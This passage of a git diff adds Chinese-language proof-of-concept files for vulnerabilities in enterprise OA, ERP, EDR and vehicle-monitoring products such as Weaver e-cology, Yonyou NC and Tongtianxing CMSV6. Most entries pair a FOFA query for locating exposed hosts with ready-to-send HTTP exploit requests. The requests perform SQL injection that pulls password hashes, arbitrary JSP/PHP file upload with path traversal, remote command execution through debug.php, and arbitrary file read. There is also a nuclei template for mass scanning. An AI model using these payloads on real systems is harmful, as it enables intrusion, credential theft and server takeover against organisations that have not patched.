+{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'} +------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- +``` + +![image-20240524231729186](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242317261.png) + + + +文件路径 + +``` +http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php +``` + diff --git a/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md b/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md new file mode 100644 index 0000000..8c07676 --- /dev/null +++ b/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md @@ -0,0 +1,53 @@ +## 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202) + +泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 + +## fofa + +``` +app="泛微-协同办公OA" +``` + + + +## poc + +``` +/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405241359251.png) + + + +## nuclei批量yaml文件 + +``` +id: ecology-loginSSO-sql-CNVD-2021-33202 +info: + name: Template Name + author: mhb17 + severity: critical + description: description + reference: + - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html + tags: ecology,sqli +requests: + - raw: + - | + GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + matchers-condition: and + matchers: + - type: word + part: header + words: + - '200' + - type: regex + part: body + regex: + - '[0-9A-F]{32}' +``` + diff --git a/瑞星EDR-XSS漏洞可打管理员cookie.md b/瑞星EDR-XSS漏洞可打管理员cookie.md new file mode 100644 index 0000000..02ede78 --- /dev/null +++ b/瑞星EDR-XSS漏洞可打管理员cookie.md @@ -0,0 +1,23 @@ +## 瑞星EDR-XSS漏洞可打管理员cookie + + + +## poc + +``` +POST /ESM/WebService/ServerOperate.asmx HTTP/1.1 +Host: 192.168.102.132 +Content-Type: text/xml; charset=utf-8 +Content-Length: 536 +SOAPAction: "Rising.ESM.WebUI.WebService/SendWaring" + + + + + + {"logid":1,"type":1,"caption":"aaaaaa","content":"aaa","date":"2022-07-04 11:05","state":1,"desc":"xxxxxxx"} + + + +``` + diff --git a/用友NC-warningDetailInfo接口存在SQL注入漏洞.md b/用友NC-warningDetailInfo接口存在SQL注入漏洞.md new file mode 100644 index 0000000..0373602 --- /dev/null +++ b/用友NC-warningDetailInfo接口存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 用友NC-warningDetailInfo接口存在SQL注入漏洞 + +用友NC /ebvp/[infopub](https://cn-sec.com/archives/tag/infopub)/warningDetailInfo接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +影响范围:NC63、NC633、NC65 + +## fofa + +``` +app="用友-UFIDA-NC" +``` + +## poc + +``` +GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![用友NC warningDetailInfo接口存在SQL注入漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251322607.png) \ No newline at end of file diff --git a/用友nc电子采购信息系统securitycheck存在sql注入.md b/用友nc电子采购信息系统securitycheck存在sql注入.md new file mode 100644 index 0000000..790d054 --- /dev/null +++ b/用友nc电子采购信息系统securitycheck存在sql注入.md @@ -0,0 +1,33 @@ +## 用友nc电子采购信息系统securitycheck存在sql注入 + + + +## fofa + +``` +body="UClient.dmg" +``` + + + +## poc + +``` +POST /ebs/securitycheck HTTP/1.1 +Host: ip +Content-Length: 237 +Method: POST securitycheck HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept: */* +Origin: http://ip +Referer: http://ip/ebs/core/login/login.jsp +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: JSESSIONID=691A17DA3C872E1E35BACBE499022DE4.server; JSESSIONID=D80A3F043CD6E898C2076206848019D9.server +Connection: close + +&accountCode=ERP%E7%B3%BB%E7%BB%9F&accountCodeValue=0001&datasource=design&corpCode=&maxWindow=0&compressStream=1&corpName=&workdate=123-09-22&userId=11' AND 1129=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(121)||CHR(69)||CHR(110),5) AND 'Fjnc'='Fjnc&password=11&&pageUniqueId=328c7f3e-aea1-4bcf-bd91-05e0d2804719&pageId=login&isAjax=1 +``` + +![image-20240525131651949](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251316035.png) \ No newline at end of file diff --git a/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md b/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md new file mode 100644 index 0000000..258bae5 --- /dev/null +++ b/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md @@ -0,0 +1,23 @@ +## 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞 + +蓝海卓越计费管理系统存在debug.php远程命令执行漏洞 + +## poc + +``` +POST /debug.php?_t=0.297317996068593 HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Length: 12 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: PHPSESSID=n8n03vmefnnrejq35697pbivl6 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest + +cmd=ls +``` + +![image-20240525134604450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251346523.png) \ No newline at end of file diff --git a/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md b/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md new file mode 100644 index 0000000..c4aae68 --- /dev/null +++ b/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md @@ -0,0 +1,29 @@ +## 蓝海卓越计费管理系统存在download.php任意文件读取漏洞 + + + +## fofa + +``` +title="蓝海卓越计费管理系统" +``` + + + +## poc + +``` +GET /download.php?file=../../../../../usr/local/usr-gui/download.php HTTP/1.1 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Length: 12 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: PHPSESSID=n8n03vmefnnrejq35697pbivl6 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +![image-20240525134843597](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405251348660.png) \ No newline at end of file diff --git a/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md b/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md index 5443cca..d922d08 100644 --- a/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md +++ b/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md @@ -9,16 +9,20 @@ body="./open/webApi.html"||body="/808gps/" ## poc ``` POST /inspect_file/upload HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate Accept: */* -content-Length: 238 -Content-Type: multipart/form-data;boundary=-----------------------------7db372eb000e2 +Connection: close +Content-Length: 226 +Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b ------------------------------7db372eb000e2 -Content-Disposition: form-data; name="uploadFile"; filename="1.jsp" +--2e7688d712bcc913201f327059f9976b +Content-Disposition: form-data; name="uploadFile"; filename="../707140.jsp" Content-Type: application/octet-stream -<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------------------------------7db372eb000e2-- +<% out.println("007319607"); %> +--2e7688d712bcc913201f327059f9976b-- ``` + +![image-20240524224902984](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242249085.png) diff --git a/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md b/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md new file mode 100644 index 0000000..3291e8a --- /dev/null +++ b/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md @@ -0,0 +1,24 @@ +## 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744) + + + +## fofa + +``` +ody="/808gps/" +``` + + + +## poc + +``` +GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + diff --git a/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md new file mode 100644 index 0000000..1224558 --- /dev/null +++ b/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md @@ -0,0 +1,25 @@ +## 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞 + +通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞 + +## fofa + +``` +body="/808gps/" +``` + +## poc + +``` +POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 +Connection: close +Content-Length: 9 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate + +json=null +``` + +![1708927720796.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242252677.png) \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md b/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md new file mode 100644 index 0000000..28654e1 --- /dev/null +++ b/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md @@ -0,0 +1,18 @@ +## 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞 + + + + +## poc + +``` +POST /xz_center/list HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close + +page=1 +``` + diff --git a/金山云EDR任意文件上传漏洞.md b/金山云EDR任意文件上传漏洞.md new file mode 100644 index 0000000..7a20e50 --- /dev/null +++ b/金山云EDR任意文件上传漏洞.md @@ -0,0 +1,50 @@ +## 金山云EDR任意文件上传漏洞 + + + +## poc + +``` +POST /softmanagement/distribute/save_tools.php HTTP/1.1 +Host: *:6868 +Content-Length: 582 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykMPE1WkVUSahanwB +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundarykMPE1WkVUSahanwB +Content-Disposition: form-data; name="toolFile"; filename="2.php." +Content-Type: image/png + +1111111 +------WebKitFormBoundarykMPE1WkVUSahanwB +Content-Disposition: form-data; name="submit" + +提交 +------WebKitFormBoundarykMPE1WkVUSahanwB +Content-Disposition: form-data; name="size" + +500 +------WebKitFormBoundarykMPE1WkVUSahanwB +Content-Disposition: form-data; name="userSession" + +1111111 +------WebKitFormBoundarykMPE1WkVUSahanwB +Content-Disposition: form-data; name="modeID" + +5 +------WebKitFormBoundarykMPE1WkVUSahanwB-- +``` + +文件路径 + +``` +http://192.168.37.134:6868/softmanagement/files/2.php +``` +